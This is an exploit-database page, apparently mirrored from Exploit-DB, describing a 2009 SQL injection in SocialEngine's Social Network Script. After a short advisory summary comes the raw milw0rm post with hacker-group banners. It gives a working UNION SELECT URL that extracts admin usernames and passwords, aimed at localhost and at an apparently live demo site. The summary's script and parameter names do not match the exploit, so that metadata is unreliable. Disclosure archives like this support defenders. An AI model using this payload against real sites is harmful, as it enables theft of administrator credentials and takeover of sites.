header-logo
Suggest Exploit
vendor:
Social Network Script
by:
Snakespc
9
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: Social Network Script
Affected Version From: 4.0.0
Affected Version To: 4.0.2
Patch Exists: YES
Related CWE: CVE-2010-4456
CPE: a:socialengine:social_network_script:4.0.2
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows, Linux, Mac
2010

Social Network Remote SQL Injection Vulnerability

A vulnerability in Social Network Script allows an attacker to inject arbitrary SQL commands. This vulnerability is due to an error in the "index.php" script when handling the "id" parameter. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.

Mitigation:

Upgrade to the latest version of Social Network Script
Source

Exploit-DB raw data:

==================================================================================================================
=         SSSSS  NN    N      AA      K   K  EEEEE  SSSSS        TTTTTTTTT EEEEE     AA     MM     MM            = 
=         S      N N   N     A  A     K  K   E      S                T     E        A  A    M M   M M            =      
+         SSSSS  N  N  N    AAAAAA    KKK    EEEEE  SSSSS            T     EEEEE   AAAAAA   M  M M  M            +       
=             S  N   N N   A      A   K  K   E          S            T     E      A      A  M   M   M            =      
=         SSSSS  N    NN  A        A  K   K  EEEEE  SSSSS            T     EEEEE A        A M       M            = 
===================================================SNAKES TEAM====================================================
+                                                                                                                =
=              	                    Script:social network  Remote SQL Injection Vulnerability                         +
+                                                                                                                =
==============================================:::ALGERIAN HaCkEr:::===============================================
                =        =                                                                =          =
                =      =          Discovered By: Snakespc  :::ALGERIAN HaCkEr:::               =     =   
                =                                                                                    =
                                    :::::Mail: snakespc@gmail.com:::::::             
                =                                                                                    =
                =          = ::::script Demo: http://www.socialengine.net/demos.php::::  =           =
                =                                                                                    =
                =                             "browse_classifieds.php"                               =
                  ===================================GAZA=============================================

Exploit:
http://localhost/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins
********
demo:
http://www.socialenginedev.com/browse_classifieds.php?s=classified_date%20DESC&v=0&classifiedcat_id=-1+UNION%20SELECT%20concat(admin_username,0x3a,admin_password),2,3+from+se_admins
================================================================= áÇ ÅáÜÜÜå ÅáÇ Çááå ãÍãÏ ÑÓÜÜÜæá Çááå =================================================

Mr.HCOCA_MAN:::DrEaDFuL:::yassine_enp:::His0k4:::Houssamix:::sunhouse2:::aSSaSSin_HaCkErS:::THE INJECTOR:::ALMADJHOOL:::Th3 g0bL!N:::
ALL www.Snakespc.com/SC >>>> Members 
Str0ke ....Milw0rm
================================================================== ÇáäÜÜÜÜÕÑ ÍáíÝäÜÜÜÜÇ íÇ ÛÜÜÜÜÜÒÉ ====================================================

# milw0rm.com [2009-01-11]